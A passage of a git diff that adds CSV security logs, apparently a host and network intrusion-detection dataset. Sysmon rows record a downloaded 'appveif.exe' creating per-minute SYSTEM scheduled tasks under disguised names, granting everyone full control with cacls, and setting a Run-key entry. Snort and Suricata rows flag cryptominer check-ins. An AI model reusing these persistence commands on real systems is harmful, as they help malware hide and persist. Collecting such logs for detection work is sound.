Williams\\\\Downloads\\\\appveif.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe\\\""""}}}" +"May 22, 2020 @ 15:27:57.173",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:12.786 +ProcessGuid: {df9fc3d3-d150-5ec7-0000-0010f8951800} +ProcessId: 6520 +Image: C:\Windows\SysWOW64\cmd.exe +FileVersion: 10.0.18362.449 (WinBuild.160101.0800) +Description: Windows Command Processor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: Cmd.Exe +CommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Netframework"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\John Williams\Downloads\appveif.exe /p everyone:F"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A +ParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400} +ParentProcessId: 6980 +ParentImage: C:\Users\John Williams\Downloads\appveif.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\appveif.exe"" ""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:12.798234900Z"",""eventRecordID"":""951"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:12.786\r\nProcessGuid: {df9fc3d3-d150-5ec7-0000-0010f8951800}\r\nProcessId: 6520\r\nImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nFileVersion: 10.0.18362.449 (WinBuild.160101.0800)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Netframework\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\John Williams\\Downloads\\appveif.exe /p everyone:F\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A\r\nParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400}\r\nParentProcessId: 6980\r\nParentImage: C:\\Users\\John Williams\\Downloads\\appveif.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\appveif.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:12.786"",""processGuid"":""{df9fc3d3-d150-5ec7-0000-0010f8951800}"",""processId"":""6520"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""fileVersion"":""10.0.18362.449 (WinBuild.160101.0800)"",""description"":""Windows Command Processor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""Cmd.Exe"",""commandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Netframework\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe /p everyone:F\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A"",""parentProcessGuid"":""{df9fc3d3-d12b-5ec7-0000-001085131400}"",""parentProcessId"":""6980"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe\\\""""}}}" +"May 22, 2020 @ 15:27:57.157",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:12.764 +ProcessGuid: {df9fc3d3-d150-5ec7-0000-0010fe8d1800} +ProcessId: 6580 +Image: C:\Windows\SysWOW64\cmd.exe +FileVersion: 10.0.18362.449 (WinBuild.160101.0800) +Description: Windows Command Processor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: Cmd.Exe +CommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Miscfost"" /ru system /tr ""cmd /c C:\Windows\ime\appveif.exe"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A +ParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400} +ParentProcessId: 6980 +ParentImage: C:\Users\John Williams\Downloads\appveif.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\appveif.exe"" ""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:12.783545400Z"",""eventRecordID"":""950"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:12.764\r\nProcessGuid: {df9fc3d3-d150-5ec7-0000-0010fe8d1800}\r\nProcessId: 6580\r\nImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nFileVersion: 10.0.18362.449 (WinBuild.160101.0800)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Miscfost\"" /ru system /tr \""cmd /c C:\\Windows\\ime\\appveif.exe\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A\r\nParentProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400}\r\nParentProcessId: 6980\r\nParentImage: C:\\Users\\John Williams\\Downloads\\appveif.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\appveif.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:12.764"",""processGuid"":""{df9fc3d3-d150-5ec7-0000-0010fe8d1800}"",""processId"":""6580"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""fileVersion"":""10.0.18362.449 (WinBuild.160101.0800)"",""description"":""Windows Command Processor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""Cmd.Exe"",""commandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Miscfost\\\"" /ru system /tr \\\""cmd /c C:\\\\Windows\\\\ime\\\\appveif.exe\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E72506477317969211638830DE3174D8,SHA256=4B2F2B322507F4E59204E8750DBDF4761825F546F617571E76461768F795FB55,IMPHASH=392B4D61B1D1DADC1F06444DF258188A"",""parentProcessGuid"":""{df9fc3d3-d12b-5ec7-0000-001085131400}"",""parentProcessId"":""6980"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe\\\""""}}}" +"May 22, 2020 @ 15:27:43.137",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""", +"May 22, 2020 @ 15:27:43.043",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""", +"May 22, 2020 @ 15:27:33.137",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'b187c4a14d4a0fc8b255a5e6dc68e1b1' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: 'd35485293b6324039fb84a913c4ac605c9050f4a' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +" +"May 22, 2020 @ 15:27:33.124",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '737129e2f8cfe11a96ca093d49dee7f2' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: '559d4974169b9c45d6f345deb22f6aeee8abefa8' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +" +"May 22, 2020 @ 15:27:27.887",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +" +"May 22, 2020 @ 15:27:21.836",14,"ATT&CK T1060: Suspicious RUN Key from Download","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:18:36.991 +ProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400} +ProcessId: 6980 +Image: C:\Users\John Williams\Downloads\appveif.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\appveif +Details: C:\Users\John Williams\Downloads\appveif.exe""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:37.001207200Z"",""eventRecordID"":""917"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:18:36.991\r\nProcessGuid: {df9fc3d3-d12b-5ec7-0000-001085131400}\r\nProcessId: 6980\r\nImage: C:\\Users\\John Williams\\Downloads\\appveif.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\appveif\r\nDetails: C:\\Users\\John Williams\\Downloads\\appveif.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:18:36.991"",""processGuid"":""{df9fc3d3-d12b-5ec7-0000-001085131400}"",""processId"":""6980"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\appveif"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe""}}}" diff --git a/data/MW_1_NIDS.csv b/data/MW_1_NIDS.csv new file mode 100644 index 0000000..abb5882 --- /dev/null +++ b/data/MW_1_NIDS.csv @@ -0,0 +1,25 @@ +"@timestamp",message,"log.file.path" +"Apr 4, 2020 @ 12:25:45.639","04/04/2020-12:25:39.613075 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50072 -> 204.79.197.222:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:25:45.621","04/04-12:25:39.613075 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50072 -> 204.79.197.222:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:25:30.635","04/04/2020-12:25:24.606004 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50071 -> 204.79.197.254:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:25:30.618","04/04-12:25:24.606004 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50071 -> 204.79.197.254:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:25:15.594","04/04/2020-12:25:09.595071 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50061 -> 13.107.136.254:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:25:15.588","04/04-12:25:09.595071 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50061 -> 13.107.136.254:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:25:00.589","04/04/2020-12:24:54.580622 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50024 -> 40.112.91.29:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:25:00.584","04/04-12:24:54.580622 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50024 -> 40.112.91.29:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:24:45.586","04/04/2020-12:24:39.527292 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50014 -> 95.101.21.130:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:24:45.586","04/04/2020-12:24:39.539403 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50015 -> 13.107.246.254:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:24:45.581","04/04-12:24:39.527292 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50014 -> 95.101.21.130:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:24:45.581","04/04-12:24:39.539403 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50015 -> 13.107.246.254:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:24:30.584","04/04/2020-12:24:24.514535 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49951 -> 13.107.3.128:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:24:30.575","04/04-12:24:24.514535 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49951 -> 13.107.3.128:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:24:15.556","04/04/2020-12:24:09.415370 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49947 -> 40.90.23.153:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:24:15.556","04/04/2020-12:24:09.506666 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49948 -> 204.79.197.200:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:24:12.543","04/04-12:24:09.415370 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49947 -> 40.90.23.153:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:24:12.543","04/04-12:24:09.506666 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49948 -> 204.79.197.200:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:24:00.553","04/04/2020-12:23:54.306232 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49935 -> 40.67.251.132:443","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:24:00.553","04/04/2020-12:23:54.332570 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49936 -> 23.217.99.136:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:23:57.540","04/04-12:23:54.306232 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49935 -> 40.67.251.132:443","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:23:57.540","04/04-12:23:54.332570 [**] [1:2024792:4] ET POLICY Cryptocurrency Miner Checkin [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:49936 -> 23.217.99.136:80","/var/log/snort/alert.fast" +"Apr 4, 2020 @ 12:20:45.502","04/04/2020-12:20:39.547395 [**] [1:2025275:3] ET INFO Windows OS Submitting USB Metadata to Microsoft [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:49837 -> 20.44.208.51:80","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 12:20:45.502","04/04-12:20:39.378041 [**] [1:2025275:3] ET INFO Windows OS Submitting USB Metadata to Microsoft [**] [Classification: Misc activity] [Priority: 3] {TCP} 172.16.2.2:49837 -> 20.44.208.51:80","/var/log/snort/alert.fast" diff --git a/data/MW_20_HIDS_1.csv b/data/MW_20_HIDS_1.csv new file mode 100644 index 0000000..a5d1e80 --- /dev/null +++ b/data/MW_20_HIDS_1.csv @@ -0,0 +1,286 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 6, 2020 @ 10:18:49.646",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:49.631",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:48.973",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:48.943",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:47.193",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:47.176",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:44.567",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'a2b4ff111ec3c70d9244f2765b6f83b7' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '55d34d80a86178f211d54007087f0fab2f5ea0e7' +" +"Apr 6, 2020 @ 10:18:41.458",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : '01a985bca6ad7246ea3a7ca8195d93e9' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '8010a779860390583ffbf9af8ead75fdfb5c8385' +" +"Apr 6, 2020 @ 10:18:40.661",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'fde4d09149bdcdc70349bc82e0dd2af6' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '10cf5ba179fe268341aff35b424f90f1f18f255f' +" +"Apr 6, 2020 @ 10:18:40.504",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:40.477",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a40f\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 10:18:40.476",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:36.396",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '63b2faa8277773a4b13b16a3c66bf06c' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : '8775a9f7233f640e824bb5f5b189261e69d2c90e' +" +"Apr 6, 2020 @ 10:18:35.098",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'a2b4ff111ec3c70d9244f2765b6f83b7' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '55d34d80a86178f211d54007087f0fab2f5ea0e7' +" +"Apr 6, 2020 @ 10:18:32.539",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : '6f381add2e6261dd58110a2cfcc3e5a5' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'b54d51c98fc3e258af23c9827605cf29e14edab8' +" +"Apr 6, 2020 @ 10:18:31.864",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'a2b4ff111ec3c70d9244f2765b6f83b7' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '55d34d80a86178f211d54007087f0fab2f5ea0e7' +" +"Apr 6, 2020 @ 10:18:30.865",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 6, 2020 @ 10:18:21.990",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : 'e5055e06c191756d0c2b480dc41a1a39' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'd06a599274d5d21d16ea461e60fc61b2d8e8ba98' +" +"Apr 6, 2020 @ 10:18:21.717",3,"Windows Logon Success", +"Apr 6, 2020 @ 10:18:13.707",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '4545fdfa85f82bb3f47e1832da72a696' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : 'b4fc38f5f5a0e09f094d02286077899027b196a7' +" +"Apr 6, 2020 @ 10:18:12.361",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:12.357",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:12.323",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:12.316",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:12.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:12.190",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:11.059",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:11.050",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:11.002",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a40f' was added. +" +"Apr 6, 2020 @ 10:18:10.996",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2a40f\Security' was added. +" +"Apr 6, 2020 @ 10:18:10.951",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 